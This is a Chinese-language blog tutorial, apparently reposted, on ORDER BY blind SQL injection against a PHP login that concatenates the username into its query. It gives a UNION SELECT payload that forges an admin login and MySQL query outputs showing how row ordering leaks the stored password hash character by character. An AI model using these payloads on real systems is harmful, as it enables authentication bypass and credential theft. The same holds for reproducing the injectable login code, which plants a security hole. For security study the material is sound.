• 利用order by 进行盲注


    0x01 利用场景

    登录代码:

    $username = $_POST['username'];
    $password = $_POST['password'];
    if(filter($username)){
        //过滤括号
    }else{
        $sql="SELECT * FROM admin WHERE username='".$username."'";
        $result=mysql_query($sql);
        @$row = mysql_fetch_array($result);
        if(isset($row) && $row['username'] === 'admin'){
            if ($row['password']===md5($password)){
                //Login successful
            }else{
                die("password error!");
            }
        }else{
            die("username does not exist!");
        }
    }

    有下列表:

    mysql> select * from admin where username='admin';
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    1 row in set (0.00 sec)

    这样一个一般的场景,用户登录时,用户名错误提示:用户名错误,用户名正确密码错误提示:密码错误

    0x02 UNION SELECT登录

    看到这个逻辑第一想法肯定是直接利用union select伪造密码登录:

    username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1
    
    mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
    +----+----------+----------------------------------+
    1 row in set (0.00 sec)

    但是想得到password怎么办

    0x03 利用order by起飞

    由登录提示可获取一个bool条件,如何用order by利用这个bool条件

    mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | 2        | 5                                |
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    |  1 | 2        | 6                                |
    +----+----------+----------------------------------+
    2 rows in set (0.01 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | 2        | 51                               |
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)
    
    mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
    +----+----------+----------------------------------+
    | id | username | password                         |
    +----+----------+----------------------------------+
    |  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
    |  1 | 2        | 52                               |
    +----+----------+----------------------------------+
    2 rows in set (0.00 sec)

    通过逐位判断便可得到password

    显然此方法在实际中使用的不多,但在一些特定的环境中也许会用到,比如实验环境,如果过滤了括号,其他盲注基本上就是废了,便可利用order by进行注入。

    著作权归作者所有。
    商业转载请联系作者获得授权,非商业转载请注明出处。
    作者:p0
    链接:http://p0sec.net/index.php/archives/106/
    来源:http://p0sec.net/

  • 相关阅读:
    如何用ST-LINK给STM32下载HEX文件
    快恢复二极管和肖特基二极管的区别和是否能够替代使用?
    Python环境变量配置
    IAP笔记
    如何将24位RGB颜色转换16位RGB颜色
    内网外网同时使用
    bootstraptable 服务端分页问题
    weblogic奇葩问题
    SSM框架
    java通过poi操作excel
  • 原文地址:https://www.cnblogs.com/xishaonian/p/7703486.html
Copyright © 2020-2023  润新知